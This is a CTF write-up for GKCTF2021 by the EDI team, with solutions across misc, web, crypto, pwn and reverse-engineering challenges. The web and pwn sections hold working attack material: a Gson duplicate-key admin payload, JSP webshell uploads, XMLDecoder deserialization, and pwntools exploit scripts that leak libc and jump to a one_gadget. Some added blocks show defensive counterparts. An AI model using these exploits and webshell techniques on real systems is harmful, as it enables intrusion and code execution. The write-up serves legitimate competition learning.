
[WP] GKCTF2021 by EDI Team

2021-06-27 15:16
            



MISC

Sign-in

1. Open the capture, find the traffic containing `cat /f4g`, and follow the HTTP stream.

2. Take the first string of digits you see, convert it from hex to text and base64-decode it: the result is empty.

3. Then take the next one and convert it the same way; after one base64 decode it cannot be base64-decoded again.

4. Comparing it carefully with the base64 above shows that this base64 is completely reversed, so write a script to reverse it and decode; the flag turns out to be written twice.

import base64

# the reversed base64 string taken from the HTTP stream (elided in this copy of the writeup)
content = list('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QIhM0QDN0Q')
content.reverse()

# once reversed, the string holds two base64 blobs separated by their '==' padding
flag1 = "".join(content).split("==")
print(flag1)

print(base64.b64decode(flag1[0] + "=="))
print(base64.b64decode(flag1[1] + "=="))


5. Extract the flag by hand

flag{Welc0me_GkC4F_m1siCCCCCC!}

Do you know apng?

1. A Baidu search shows that apng is an animated image format, so look for software that plays apng properly; Firefox displays apng images correctly. It is an animation of a little girl holding flowers, walking and hopping.

2. Searching further turns up a tool called apngdis; use it to split the apng into frames.

3. Among the split frames, QR codes are in frames 2, 10, 18 and 26.

flag{a3c7e4e5-9b9d-ad20-0327-288a235370ea}


FireFox_Forensics

1. A GitHub search turns up the tool firepwd, which decrypts the stored credentials directly and gives the flag.

https://github.com/lclevy/firepwd

GKCTF{9cf21dda-34be-4f6c-a629-9c4647981ad7}

Excel tricks

1. Open the Excel file; the sheet says "I saw the flag, did you?", so something is probably hidden. Clicking around shows that some cells contain 1 and others are empty, so select a large range and switch the format to General.

2. The pattern of 1s looks odd, so adjust the column width and fill the cells; it turns out to be a Han Xin code.

3. Scan the code to get the flag.

flag{9ee0cb62-f443-4a72-e9a3-43c0b910757e}

Ginkgo Island's Bizarre Adventure

1. Play the game: switch survival mode to creative mode and defeat the monster at the coordinates given in the book. It drops a new book containing the flag and the next coordinates.

Result: flag{w31c0me_t0_9kctf_2021_Check_1n}

Survey

flag{787c37cc-5ec2-9aae-f9c5-c1cc624caec0}



WEB

easycms

http://bbfc2a5d-0b65-4797-a93b-d24f0bf88bf9.node3.buuoj.cn/index.php?mode=getconfig

After getting the version, find the source online and set it up locally.


There is a demo user.


Log in to the backend with demo/demo. This CMS verifies files for high-risk operations.

In the material rename function, upload a txt file and then move it to tmp, which bypasses the file verification:

../../../../../system/tmp/giny


Then modify the template to cat the flag.


Visit the homepage to get the flag.


babycat

Register a user via the register endpoint and enter the system.


The download test function has an arbitrary file read; it turns out that readflag must be executed.


Read web.xml, then read all the class files in turn.


Code audit: here Gson's lenient parsing can be used to create a user with role admin.



payload={"data":"{\"username\":\"%s\",\"role\":'admin',\"password\":\"123\",\"role\":\"123\",'role':admin}"%(name)}

This gives the user's password:

gPFOUvzf/123
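The payload above relies on a lenient parser accepting duplicate keys and non-standard quoting, with a later `role` overriding an earlier one. The following Python analogue (added here, not code from the writeup or the challenge, and not a reproduction of the server's Gson handling) shows last-key-wins behaviour beside a strict parser that rejects duplicates and refuses client-supplied roles outright; the request bodies are constructed samples.

```python
import json

def reject_duplicates(pairs):
    """object_pairs_hook: fail closed when a key appears twice in one object."""
    keys = [k for k, _ in pairs]
    dupes = {k for k in keys if keys.count(k) > 1}
    if dupes:
        raise ValueError("duplicate JSON keys: %s" % sorted(dupes))
    return dict(pairs)

def parse_lenient(raw):
    """Last-key-wins: a later duplicate silently overrides the earlier value."""
    return json.loads(raw)

def parse_strict(raw):
    return json.loads(raw, object_pairs_hook=reject_duplicates)

def registration_allowed(raw):
    """Strict parse; any syntax error or duplicate key refuses the request,
    and role is never accepted from the client at all."""
    try:
        body = parse_strict(raw)
    except ValueError:            # JSONDecodeError is a ValueError subclass
        return False
    return set(body) == {"username", "password"}

# constructed request bodies
DUPLICATE_ROLE = '{"username":"u1","role":"user","password":"123","role":"admin"}'
NONSTANDARD = '''{"username":"u1","role":'admin',"password":"123"}'''
CLEAN = '{"username":"u1","password":"123"}'
```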

Continue auditing.

At web2/WEB-INF/classes/com/web/servlet/uploadServlet.class

the key check in the file upload has no return, so the WAF is effectively useless; write a shell directly.


The upload directory is not accessible, so write to static instead.


Read the flag.




babycat-revenge

Same as babycat: files can be uploaded, but here the ineffective-WAF problem has been fixed, so a shell certainly cannot be written directly.



Looking closely, the xml format is allowed.


In the login endpoint, a new database variable is created on every request.


Following it, the database connection reads its configuration from db.xml; here you can see an XMLDecoder deserialization.



The logic is now clear: first overwrite db.xml with malicious content, then log in to trigger the deserialization.

For the deserialization, look at the upload WAF: it blocks "Runtime", "exec", "ProcessBuilder", "jdbc", "autoCommit".

PrintWriter can be used to write a shell (this was hinted as well).

The content check can be bypassed directly with unicode.

First overwrite db.xml.


Then request login again to trigger the deserialization and write the shell (the absolute path here was taken from babycat; forgot to read the environment variable, which cost first blood).



http://82804f15-8abb-4094-ba41-7555407568a3.node3.buuoj.cn/static/1.jsp?pwd=b&i=/readflag
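The writeup does not spell out which unicode encoding defeated the content check. The example below (added here, not code from the writeup or the challenge) assumes XML numeric character references, which the XML parser resolves before XMLDecoder ever sees the text, and shows why a substring blacklist over the raw upload misses them while the same list applied to the parsed values does not; the db.xml samples are constructed.

```python
import xml.etree.ElementTree as ET

# the upload filter's word list, as given in the writeup
BLOCKED = ("Runtime", "exec", "ProcessBuilder", "jdbc", "autoCommit")

def raw_check(content):
    """Substring blacklist on the uploaded text: what the challenge's WAF does."""
    return not any(word in content for word in BLOCKED)

def parsed_check(content):
    """Same blacklist, but applied to the strings the XML parser actually yields."""
    try:
        root = ET.fromstring(content)
    except ET.ParseError:
        return False                       # unparseable db.xml is refused, not passed through
    for el in root.iter():
        for value in (el.text or "", el.tail or "", *el.attrib.values()):
            if any(word in value for word in BLOCKED):
                return False
    return True

# constructed samples in XMLDecoder's element vocabulary; in the first one the
# letter 'R' is written as the numeric character reference &#82;
ENCODED = '<java version="1.8"><string>java.lang.&#82;untime</string></java>'
PLAIN = '<java version="1.8"><string>java.lang.String</string></java>'
```

Checking the raw bytes and checking the parsed values disagree on ENCODED; the durable fix is an allowlist of permitted element and class names checked after parsing, since any substring blacklist can be written around by another encoding.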




CRYPTO

Random

Python's RNG is MT19937, a thoroughly worn-out topic.

Just use the randcrack module.

from hashlib import md5
from randcrack import RandCrack

def foo(l, i):
    # each group of three lines holds a 32-, 64- and 96-bit output;
    # getrandbits(k) for k > 32 concatenates 32-bit words low word first,
    # so split them back into the order the generator produced them
    a = []
    a.append(l[i])
    b1 = l[i+1] >> 32
    b2 = l[i+1] & (2**32-1)
    a.append(b2)
    a.append(b1)
    b1 = l[i+2] >> 64
    b2 = (l[i+2] & (2**64-1)) >> 32
    b3 = l[i+2] & (2**32-1)
    a.append(b3)
    a.append(b2)
    a.append(b1)
    return a

with open(r'random.txt', 'r') as f:
    l = f.readlines()
l = [int(i.strip()) for i in l]
ll = []
for i in range(0, len(l), 3):
    ll += foo(l, i)
rc = RandCrack()
for i in ll:                 # randcrack needs 624 consecutive 32-bit outputs
    rc.submit(i)
aa = rc.predict_getrandbits(32)
print('flag{%s}' % md5(str(aa).encode()).hexdigest())
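What randcrack does internally, as an added example that is not part of the writeup: untemper 624 consecutive 32-bit outputs back into MT19937 state words and load them into a fresh random.Random, which then tracks the original generator. The split_words helper generalises the foo function above to any getrandbits width, and the leaked sequence is a constructed sample with the same 32/64/96-bit mix as the challenge file. The lesson for defenders is that anything derived from random (tokens, reset codes) is predictable from a few hundred observed values; use secrets instead.

```python
import random

MASK32 = 0xFFFFFFFF

def untemper(y):
    """Invert MT19937's output tempering: a 32-bit output gives back its state word."""
    y ^= y >> 18
    y ^= (y << 15) & 0xEFC60000
    x = y
    for _ in range(5):                 # undo y ^= (y << 7) & 0x9D2C5680, 7 bits per pass
        x = y ^ ((x << 7) & 0x9D2C5680)
    y = x
    for _ in range(3):                 # undo y ^= y >> 11, 11 bits per pass
        x = y ^ (x >> 11)
    return x & MASK32

def split_words(value, nbits):
    """getrandbits(k) for k > 32 concatenates ceil(k/32) outputs, lowest word first."""
    return [(value >> (32 * i)) & MASK32 for i in range((nbits + 31) // 32)]

def clone_rng(words):
    """Rebuild a random.Random from any 624 consecutive 32-bit outputs."""
    state = tuple(untemper(w) for w in words[:624])
    clone = random.Random()
    clone.setstate((3, state + (624,), None))   # index 624: next call regenerates the block
    return clone

def untemper_roundtrip(seed):
    """Sanity check: untempering the first output yields state word 0."""
    r = random.Random(seed)
    return untemper(r.getrandbits(32)) == r.getstate()[1][0]

def demo(seed=20210627):
    """Constructed leak mimicking the challenge file: 32/64/96-bit outputs in rotation."""
    victim = random.Random(seed)
    leaked = []
    for _ in range(104):                          # 104 * (1 + 2 + 3) = 624 words
        for k in (32, 64, 96):
            leaked += split_words(victim.getrandbits(k), k)
    clone = clone_rng(leaked)
    return all(clone.getrandbits(32) == victim.getrandbits(32) for _ in range(10))
```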

RRRRsa

from Crypto.Util.number import inverse, long_to_bytes
from gmpy2 import gcd
e=65537
c=13492392717469817866883431475453770951837476241371989714683737558395769731416522300851917887957945766132864151382877462142018129852703437240533684604508379950293643294877725773675505912622208813435625177696614781601216465807569201380151669942605208425645258372134465547452376467465833013387018542999562042758
n1=75003557379080252219517825998990183226659117019770735080523409561757225883651040882547519748107588719498261922816865626714101556207649929655822889945870341168644508079317582220034374613066751916750036253423990673764234066999306874078424803774652754587494762629397701664706287999727238636073466137405374927829
c1=68111901092027813007099627893896838517426971082877204047110404787823279211508183783468891474661365139933325981191524511345219830693064573462115529345012970089065201176142417462299650761299758078141504126185921304526414911455395289228444974516503526507906721378965227166653195076209418852399008741560796631569
hint1=23552090716381769484990784116875558895715552896983313406764042416318710076256166472426553520240265023978449945974218435787929202289208329156594838420190890104226497263852461928474756025539394996288951828172126419569993301524866753797584032740426259804002564701319538183190684075289055345581960776903740881951
hint2=52723229698530767897979433914470831153268827008372307239630387100752226850798023362444499211944996778363894528759290565718266340188582253307004810850030833752132728256929572703630431232622151200855160886614350000115704689605102500273815157636476901150408355565958834764444192860513855376978491299658773170270
n2=114535923043375970380117920548097404729043079895540320742847840364455024050473125998926311644172960176471193602850427607899191810616953021324742137492746159921284982146320175356395325890407704697018412456350862990849606200323084717352630282539156670636025924425865741196506478163922312894384285889848355244489
c2=67054203666901691181215262587447180910225473339143260100831118313521471029889304176235434129632237116993910316978096018724911531011857469325115308802162172965564951703583450817489247675458024801774590728726471567407812572210421642171456850352167810755440990035255967091145950569246426544351461548548423025004
hint3=25590923416756813543880554963887576960707333607377889401033718419301278802157204881039116350321872162118977797069089653428121479486603744700519830597186045931412652681572060953439655868476311798368015878628002547540835719870081007505735499581449077950263721606955524302365518362434928190394924399683131242077
hint4=104100726926923869566862741238876132366916970864374562947844669556403268955625670105641264367038885706425427864941392601593437305258297198111819227915453081797889565662276003122901139755153002219126366611021736066016741562232998047253335141676203376521742965365133597943669838076210444485458296240951668402513
# the two hints for n1 satisfy a relation that vanishes modulo one prime factor,
# so the gcd of their difference with n1 recovers that factor
a=pow(2020*(hint2-212121),202020,n1)
b=pow(2021,202020,n1)*hint1
q1=int(gcd(a-b%n1,n1))
# c1 is p (a factor of the final n) encrypted under n1
p=pow(c1,inverse(e,(q1-1)*(n1//q1-1)),n1)
# same idea for n2, whose hints are raised to the exponents directly
a=pow(hint3,212121,n2)*pow(2020,212121*202020,n2)%n2
b=pow(hint4,202020,n2)*pow(2021,212121*202020,n2)%n2
p2=int(gcd(a-b%n2,n2))
# c2 is q (the other factor of the final n) encrypted under n2
q=pow(c2,inverse(e,(p2-1)*(n2//p2-1)),n2)
m=pow(c,inverse(e,(p-1)*(q-1)),p*q)
print(long_to_bytes(m))

PWN

checkin

#coding:utf-8
# Python 2 pwntools script (string payloads, .next() on the libc search iterator)
import sys
from pwn import *
context.log_level='debug'
elfelf='./login'
#context.arch='amd64'
while True :
    # try :
    elf=ELF(elfelf)
    context.arch=elf.arch
    if len(sys.argv)==1 :
        io=process(elfelf)
        # io=process([elf,'127.0.0.1','9999'])
        libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadget=[0x45226,0x4527a,0xf0364,0xf1207]
    else :
        io=remote('node3.buuoj.cn',26961)
        libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadget=[0x45226,0x4527a,0xf0364,0xf1207]
    io.recv()
    pay='admin\x00\x00\x00'+p64(0x0000000000401ab3)+p64(elf.got['puts'])+p64(0x4018B5)
    io.send(pay)
    io.recv()
    io.send('admin\x00\x00\x00'+p64(0)*3+p64(0x602400))

    # the leaked puts address gives the libc base
    libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['puts']
    libc.address=libc_base
    bin_sh_addr=libc.search('/bin/sh\x00').next()
    system_addr=libc.sym['system']
    io.recv()
    pay='admin\x00\x00\x00'*3+p64(0x4527a+libc_base)   # one_gadget for libc-2.23
    io.send(pay)
    io.recv()
    # gdb.attach(io)
    io.send('admin\x00\x00\x00'*4+p64(0x602418))

    success('libc_base:'+hex(libc_base))
    # success('heap_base:'+hex(heap_base))

    #
    io.interactive()
    # except Exception as e:
    #     io.close()
    #     continue
    # else:
    #     continue

demo_catroom

#coding:utf-8
# Python 2 pwntools script driving the challenge's own client binary
import sys
from pwn import *
context.log_level='debug'
elfelf='./client'
#context.arch='amd64'
while True :
    # try :
    elf=ELF(elfelf)
    context.arch=elf.arch
    if len(sys.argv)==1 :
        # io=process(elfelf)
        # sh=process('./server')
        io=process(['./client','117.21.200.165','27268'])
        # libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        # one_gadget=[0x45226,0x4527a,0xf0364,0xf1207]
    else :
        # sh=ssh(host='node3.buuoj.cn', user='ctf', port=25744, password='123456')
        # io=remote('node3.buuoj.cn',28324)
        # libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadget=[0x45226,0x4527a,0xf0364,0xf1207]

    # menu wrappers: 1 add, 2 login, 3 show, 4 delete
    def add(a,b):
        io.sendlineafter('0 exit \n','1')
        io.sendlineafter('\n',a)
        io.sendlineafter('\n',b)
    def login(a,b):
        io.sendlineafter('0 exit \n','2')
        io.sendlineafter('\n',a)
        io.sendlineafter('\n',b)
    def show(a):
        io.sendlineafter('0 exit \n','3')
        io.send(a)
        return io.recv()
    def delete(a,b):
        io.sendlineafter('0 exit \n','4')
        io.sendlineafter('\n',a)
        io.sendlineafter('\n',b)
    add('a','a')
    add('b','b')
    add('c','c')
    delete('a','a')
    # re-add with an oversized record so the data overruns into the admin field
    add('a'*0x20,'a'*0x28+'\xff'*8+'admin')
    login('admin','b')
    # sh.recv()
    io.interactive()
    # except Exception as e:
    #     io.close()
    #     continue
    # else:
    #     continue

RE

QQQQT

Base58

12t4tww3r5e77


Crash

After restoring the Go symbol table, main restricts the flag to length 43 and the format GKCTF{}.

It then enters main_check.

The first stage, main_encrypto, contains Encrypt_DesEncrypt, which in turn contains crypto_des_NewTripleDESCipher, so it is 3DES.

The key is already given:

Just decrypt.

Of the remaining three stages, the first is sha256,

the second is sha512,

and the last is md5.

Brute-force and decrypt; note that each of them covers 4 bytes.
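Why the 4-byte granularity matters, as an added example that is not part of the writeup: because each chunk is hashed on its own, the three chunks can be searched independently, so the work is three searches of size |alphabet|^4 instead of one of size |alphabet|^12. The stand-in below (constructed; the real binary's digests and alphabet are not reproduced) uses the same sha256/sha512/md5 order and a shrunken alphabet so it runs in seconds.

```python
import hashlib
from itertools import product

# Constructed stand-in for the Crash binary's final three stages: the flag body is checked
# four bytes at a time, each chunk against its own digest. Alphabet shrunk so it runs fast.
ALPHABET = b"0123456789abcdef"
STAGES = ("sha256", "sha512", "md5")
CHUNK = 4

def chunk_targets(secret):
    """What the binary embeds: one digest per 4-byte chunk, each with its own algorithm."""
    return [hashlib.new(alg, secret[i * CHUNK:(i + 1) * CHUNK]).hexdigest()
            for i, alg in enumerate(STAGES)]

def crack_chunk(alg, target):
    """Exhaust the 4-byte space for one chunk, independently of the others."""
    for cand in product(ALPHABET, repeat=CHUNK):
        cand = bytes(cand)
        if hashlib.new(alg, cand).hexdigest() == target:
            return cand
    return None

def crack_all(targets):
    parts = [crack_chunk(alg, t) for alg, t in zip(STAGES, targets)]
    return None if any(p is None for p in parts) else b"".join(parts)

def search_cost():
    """Worst-case hashes: per-chunk search vs. one digest over the whole 12 bytes."""
    n = len(ALPHABET)
    return len(STAGES) * n ** CHUNK, n ** (CHUNK * len(STAGES))
```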





APK-debug

TEA in the native library.

Note that the key has been changed.

Just decrypt.

#include <stdio.h>

/* TEA decryption with the challenge's modified constants: delta is not the
 * standard 0x9E3779B9 and the key is the one recovered from the native library. */
void DecryptTEA(unsigned int *firstChunk, unsigned int *secondChunk, unsigned int *key)
{
    unsigned int sum = 0;
    unsigned int y = *firstChunk;
    unsigned int z = *secondChunk;
    unsigned int delta = 0x458BCD42;
    sum = delta << 5;                       /* 32 rounds * delta, truncated to 32 bits */
    for (int i = 0; i < 32; i++)
    {
        /* parentheses make the C precedence explicit: + binds tighter than ^ */
        z -= ((y << 4) + key[2]) ^ (y + sum) ^ ((y >> 5) + key[3]);
        y -= ((z << 4) + key[0]) ^ (z + sum) ^ ((z >> 5) + key[1]);
        sum -= delta;
    }
    *firstChunk = y;
    *secondChunk = z;
}

int main(void)
{
    unsigned int key[4] = {9, 7, 8, 6};
    unsigned int data[3] = {0xF5A98FF3, 0xA21873A3, 0};   /* trailing 0 terminates the string */
    DecryptTEA(&data[0], &data[1], key);
    printf("0x%x 0x%x\n", data[0], data[1]);
    printf("%s\n", (char *)data);
    return 0;
}

  • For more CTF writeups, follow EDI Security!

    EDI Security's CTF team regularly takes part in major CTF competitions and keeps up with CTF events. We are working to build a good technical atmosphere in the security community, and this is definitely a good place to learn. The bar is not high, but the members are experienced and can take you from the basics; as long as you have the determination to keep at it, the next CTF star could be you.

    Everyone, experts and beginners alike, is welcome to join us, play CTF together and improve together.


Source: https://mp.weixin.qq.com/s?__biz=MzIzMTQ4NzE2Ng==&mid=2247488643&idx=1&sn=fc6838f86df389832ffe764f56617e51
